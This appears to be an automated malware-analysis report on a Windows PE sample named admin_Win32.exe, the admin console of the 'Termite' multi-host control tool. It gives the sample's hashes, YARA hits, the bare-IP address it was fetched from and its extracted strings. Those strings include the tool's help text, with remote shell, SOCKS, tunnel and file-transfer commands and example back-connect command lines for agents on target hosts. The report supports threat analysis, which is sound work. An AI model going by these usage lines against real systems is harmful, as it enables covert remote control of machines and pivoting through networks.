Sample details: 937ab62ec68d58596b6ad02dd139ba1a

Hashes
MD5: 937ab62ec68d58596b6ad02dd139ba1a
SHA1: 41e2f853f250c8aca127ca111079f6a7dc06d278
SHA256: d83862b5bbe3aa774e949d77d67c9c7b83dbd3b01c7fb9199353c79f28662b6d
SSDEEP: 1536:4eSUW73S+w/1BKKaAxtyzF7QeVH/BdOXKh:4e+bq/1wKaAxtyp7DVP4Kh
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsConsole | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings
Source
http://173.199.71.172/admin_Win32.exe
Strings
		!This program cannot be run in DOS mode.
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
127.0.0.1
libgcc_s_dw2-1.dll
__register_frame_info
libgcj-13.dll
_Jv_RegisterClasses
__deregister_frame_info
[ ERROR    ]  
WSAStartup failed!
cmd.exe
bind wrong.
Socket Server Starting now !
server start error pvalue is NULL
Got A Shell Session Here >>
start a new cmd shell here
GoodBye ! Shell Session Closed Now .
remember free this tree
node_id = %d ,child_num = %d,k = %d
res = 0? child_num = %d, k = %d
Zero tree
MacOSX
Windows
Arm-Linux
Unknow-OS
SOCKSv4 Not Support now!
the recv ip is %s
Something error on read URL
the read url is %s 
Not support IPv6?
NOT IPv4 IPv6 and URL ?
 Tcp ---> %s:%d 
Not support  UDP?
[ WARNNING ]  
--> %3d <-- (close)used/unused  %d/%d
Please wait a moment... I will try my best to release more resources.
--> %3d <-- (open)used/unused  %d/%d
[ OK       ]  
New Agent(%d) Online. Its father(%d)..
[ ERROR    ]  
CloseJob Error 1111
Unsupport now %d
UNKNOWN proto->cmdType %d
[ ERROR    ]  
add error ????
NodeType is error
Send info Error
[ OK       ]  
[recv ]id = %d,ostype = %d , nodetype = %d, pcname = %s
info == NULL or myself == NULL
UNKNOWN client node type %d
[ ERROR    ]  
list is null or List-> joblist is NULL
describe :%s , %d
[ ERROR    ]  
conn is NULL
proto is NULL
PROTOBUFLEN_OVERFLOW !!!!!
PROTO_RecvProto recv len error
[ ERROR    ]  
NEW TUNNEL to %d Build Error
nextconn == M_GETTARGETCONN_ERROR targetid = %d
M_BUILDDIRECTTUNNEL_ERROR targetid = %d
M_BUILDREVERSETUNNEL_ERROR targetid = %d
UNKNOWN nextconn -> ConnType
[ ERROR    ]  
GLOBAL_SetJobList NULL joblist
GLOBAL_GetJobList NULL joblist
No Name Now
[ OK       ]  
MY ID IS %d, Upper ID is %d
{id:%d,OSType:%d,pcname:%s,linktype:%d}
***************1 Neighbor node list ************
*************** Tree node map      ************
my id is %d now.
[ ERROR    ]  
nrecv (%d) != maxlen (%d)
m_fun_server_cbf no CBF fun????
[ ERROR    ]  
pvalue is NULL
conn is NULL
BuildTargetSock Error
[ ERROR    ]  
RECV MSG ERROR
[ OK       ]  
New_Message_Here -->%s
[ ERROR    ]  
Open %s File Error
[ OK       ]  
UPFile CMD exec Ok !
Open %s File error
[ ERROR    ]  
Recv CMDMsg Error
CCProxy_onNewTunnel Error CMD(%d)
c:p:hvadq
tohost
toport
version
detailed
This node is Admin
[ ERROR    ]  
 arg is unknown
[ OK       ]  
c is %c
sendmsg
send msg here
sendmsg %s
 >>>>>>>>>>>>> Current ID is %d <<<<<<<<<<<<< 
goto %d
Current be contral ID is %d
listen
target agent listen new port here
listen %d
connect
target agent connect new agent
connect %s%ds %s
remote ip   :%s
remote port :%d
Start socks server from target agent
socks %d
Start Socks from %d port,Server Agent is %d
lcxtran
lcxtran %s %s%ds %s
locolport   :%d
shell %d
band %d's shell on %d locol port.
upfile
upfile %s %s
From ->(%s),To -> (%s)
downfile
downfile %s %s
unknow cmd
**************************************************************************
                          BASE COMMAND
 ------------------------------------------------------------------------     
This help text.
0. help
 %-35s %s
Display agent map.
1. show
==========================================================================
                          AGENT CONTROL
Select id as target agent.
2. goto     [id]
Start server port on target agent.
3. listen   [port]
Connect new agent from target agent.
4. connect  [ip] [port]
 START A SERVER ON TARGET AGENT,THEN BIND IT WITH LOCAL PORT
Start a socks server.
5. socks    [lport]
Build a tunnel with remote host.
6. lcxtran  [lport] [rhost] [rport]
Start a shell server.
7. shell    [lport]
Upload file from local host.
8. upfile   [from_file] [to_file]
Download file from target agent.
9. downfile [from_file] [to_file]
Beta 1.0
VERSION : %s
	$ ./xxx -h
	$ ./xxx -c [rhost] -p [rport]
---------
options :
Remote host address.
%4s %-8s %s
The port on remote host.
This help page.
Show the version.
Show the about text.
Show the detailed text.
          ."'".
      .-./ _=_ \.-.
     {  (,(oYo),) }}
     {{ |   "   |} }
     { { \(---)/  }}
     {{  }'-=-'{ } }
     { { }._:_.{  }}
     {{  } -:- { } }
     {_{ }'==='{  _}
    ((((\)     (/))))
Termite
 %s is a Machine Control Tool.It has many advantages.
 There is a level-1 tool before ,you can find it from 
 http://www.rootkiter.com/EarthWorm/ .
 On the basis of 'EarthWorm',I added a built-in shell,
 then add so much commands there. You can find more 
 discription by add '-h' and '-d' parameter.
 Contributors
 rootkiter : The creator
 wooyaa    : Proviede some advice
 syc4mor3  : Named for this tool
 1. You can control multiple hosts at the same time
   In "admin_exe" there is a built-in shell.
   So that,you can do different operation at the same time.
 2. It support Multiple control command.
    1. Lcx_Tran       2. SOCKSv5 Server
    3. Shell-Server   4. Upload file 
    5. Download file  
 3. You can manage Common e-machine.
   It support various OS or CPU.For example:
        Linux  (x86/x64/Arm/Mipsel);
        Windows(x86/x64);
        MacOS  (x64);
       More is coming...
 4. You can use it on the Intranet or Extranet.
   Eg:
   4-1: When target has public IP,manage it with direct mode.
      a-step) Run agent on target host:
        $ ./agent_exe -l 8888
      b-step) Manage it with connect it
        $ ./admin_exe -c [target-ip] -p 8888 .
   4-2. When target in a remote Extranet.You can Manage it
        through a third-HOST(With public IP).
      a-step) Run agent on third-HOST:
      b-step) back-connect third-HOST from target with agent
        $ ./agent_exe -c [third-HOST ip] -p 8888
      c-step) Manage target through third-HOST
        $ ./admin_exe -c [third-HOST ip] -p 8888
 5. You can manage remote hosts through a multi-level cascade.
   In the build-in shell,there is a "connect" or "listen" 
   command,you can use it recv another agent,then manage the  
   new agent together.
Beta 1.0
VERSION : %s
Mingw runtime failure:
  VirtualQuery failed for %d bytes at address %p
  Unknown pseudo relocation protocol version %d.
  Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
POSIXLY_CORRECT
GCC: (GNU) 4.8.1
CreateProcessA
CreateThread
DeleteCriticalSection
EnterCriticalSection
ExitProcess
GetLastError
GetModuleHandleA
GetProcAddress
InitializeCriticalSection
LeaveCriticalSection
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_onexit
_setmode
atexit
calloc
fclose
fflush
fprintf
fwrite
getenv
malloc
memcpy
memset
printf
putchar
signal
sprintf
sscanf
strcpy
strlen
strncpy
vfprintf
WSASocketA
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
connect
gethostbyname
inet_ntoa
listen
select
shutdown
KERNEL32.dll
msvcrt.dll
WS2_32.dll
WSOCK32.DLL